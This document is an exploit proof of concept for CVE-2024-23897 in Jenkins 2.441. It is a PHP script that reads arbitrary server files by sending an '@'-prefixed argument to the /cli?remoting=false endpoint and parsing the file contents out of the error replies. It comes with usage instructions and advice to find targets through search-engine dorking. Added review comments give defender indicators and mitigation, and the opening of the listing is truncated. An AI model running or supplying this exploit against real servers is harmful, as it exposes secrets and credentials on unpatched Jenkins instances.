=============================================================================================================================================
| # Title : Jenkins 2.441 read files Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://www.jenkins.io/changelog/2.441/ |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] Code Description: read files in Jenkins (Related : https://packetstorm.news/files/id/188696/ Related CVE numbers: CVE-2024-23897 ) .
[+] save code as poc.php.
[+] Usage: php script.php -u -f [-p ]
[+] PayLoad :
// NOTE(review): the listing is truncated here. The PHP open tag and the start
// of the statement below are missing from the page; only its tail survives.
// The two surviving keys are the PHP ssl stream-context options that switch
// off TLS certificate and host-name verification.
[ 'verify_peer' => false, 'verify_peer_name' => false, ] ]);

// Defender summary (derived from the code below):
//   * Traffic shape: two HTTP POSTs to <base>/cli?remoting=false that carry the
//     same "Session" header value, one with "Side: upload" and one with
//     "Side: download". The upload body holds a CLI argument starting with "@".
//   * The User-Agent is a fixed browser string, so it is not a useful indicator;
//     match on the path and the Side/Session headers instead.
//   * Mitigation: run a Jenkins release that contains the fix for CVE-2024-23897
//     (see the vendor advisory for that CVE); where upgrading is not yet
//     possible, block or disable access to the CLI endpoint.

// Define the colour constants for terminal output.
// NOTE(review): RED, GREEN, YELLOW and ENDC are never referenced in the visible
// code; only ENCODING is used.
const RED = "\033[91m";
const GREEN = "\033[92m";
const YELLOW = "\033[93m";
const ENDC = "\033[0m";
const ENCODING = "UTF-8";

// Build one frame of the request body sent to Jenkins.
//
// Layout produced: two zero bytes, a 16-bit big-endian value (string length + 2),
// one byte holding $operation, a 16-bit big-endian string length, then the
// string bytes themselves.
//
// $string    - payload text for the frame (may be empty).
// $operation - numeric opcode stored as a single byte.
// Returns the frame as a binary string.
function jenkins_arg($string, $operation) {
    $out_bytes = "\x00\x00";
    $out_bytes .= pack("n", strlen($string) + 2);
    $out_bytes .= chr($operation);
    $out_bytes .= pack("n", strlen($string));
    $out_bytes .= $string;
    return $out_bytes;
}

// Send the "upload" half of the CLI exchange.
//
// The body is five frames: the command name "connect-node", the argument
// "@" + $file_path, the encoding name, the locale "en" and an empty frame.
// NOTE(review): opcodes 0/2/1/3 presumably mean argument / encoding / locale /
// start, judging by the values paired with them - confirm against the Jenkins
// CLI protocol.
// The "@"-prefixed argument is the core of CVE-2024-23897: the server-side
// argument parser treats it as a file reference and reads that file.
//
// $url       - base URL of the Jenkins instance.
// $uuid_str  - value for the "Session" header, shared with the download request.
// $file_path - path placed after "@" in the argument frame.
// $useragent - value for the "User-Agent" header.
// $proxy     - optional proxy; when set, requests go through it with full URIs.
// Returns nothing; the response is discarded.
function send_upload_request($url, $uuid_str, $file_path, $useragent, $proxy) {
    // Fixed 0.3 s pause before the request is built and sent.
    usleep(300000);
    $data = jenkins_arg("connect-node", 0) . jenkins_arg("@" . $file_path, 0) . jenkins_arg(ENCODING, 2) . jenkins_arg("en", 1) . jenkins_arg("", 3);
    $opts = [
        'http' => [
            'method' => 'POST',
            'header' => [
                "User-Agent: $useragent",
                "Session: $uuid_str",
                "Side: upload",
                "Content-type: application/octet-stream"
            ],
            'content' => $data,
            'timeout' => 3
        ]
    ];
    if ($proxy) {
        $opts['http']['proxy'] = $proxy;
        $opts['http']['request_fulluri'] = true;
    }
    $context = stream_context_create($opts);
    // "@" suppresses warnings, so a failed or timed-out request goes unnoticed.
    @file_get_contents($url . "/cli?remoting=false", false, $context);
}

// Send the "download" half of the CLI exchange and interpret the reply.
//
// $url, $uuid_str, $useragent, $proxy - same meaning as in send_upload_request().
// Returns false when the reply contains "No such file:", the quoted text of
// every "No such agent" message joined by newlines when such messages are
// present, otherwise the reply with NUL bytes turned into newlines and trimmed.
// The "No such agent" branch shows where the disclosure happens: the server's
// own error message echoes the expanded argument back to the client.
function send_download_request($url, $uuid_str, $useragent, $proxy) {
    $opts = [
        'http' => [
            'method' => 'POST',
            'header' => [
                "User-Agent: $useragent",
                "Session: $uuid_str",
                "Side: download"
            ],
            'timeout' => 3
        ]
    ];
    if ($proxy) {
        $opts['http']['proxy'] = $proxy;
        $opts['http']['request_fulluri'] = true;
    }
    $context = stream_context_create($opts);
    // Errors are silenced; on failure $response is false rather than a string.
    $response = @file_get_contents($url . "/cli?remoting=false", false, $context);
    if (strpos($response, "No such file:") !== false) {
        echo "File does not exist\n";
        return false;
    }
    if (strpos($response, "No such agent") !== false) {
        preg_match_all('/No such agent \"(.*?)\"/', $response, $matches);
        return isset($matches[1]) ? implode("\n", $matches[1]) : "";
    }
    return trim(str_replace("\x00", "\n", $response));
}

// Run both requests for one file path and print whatever comes back.
//
// A fresh uniqid() value ties the two requests together through the "Session"
// header. NOTE(review): uniqid() is time-derived, so despite the variable name
// this is not a UUID.
// Prints the returned text followed by a newline, or a bare newline when the
// download step returned false or an empty string.
function read_file($url, $file_path, $useragent, $proxy) {
    $uuid_str = uniqid();
    send_upload_request($url, $uuid_str, $file_path, $useragent, $proxy);
    $file_contents = send_download_request($url, $uuid_str, $useragent, $proxy);
    if ($file_contents) {
        echo $file_contents . "\n";
    } else {
        echo "\n";
    }
}

// Entry point: parse -u/--url, -f/--file and -p/--proxy, then run read_file().
// The URL and file options are required; the script exits with the usage line
// when either is missing.
$options = getopt("u:f:p:", ["url:", "file:", "proxy:"]);
$url = $options['u'] ?? $options['url'] ?? '';
$file = $options['f'] ?? $options['file'] ?? '';
$proxy = $options['p'] ?? $options['proxy'] ?? '';
// Hard-coded browser User-Agent sent on both requests.
$useragent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36";
if (!$url || !$file) {
    exit("Usage: php script.php -u -f [-p ]\n");
}
read_file($url, $file, $useragent, $proxy);

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================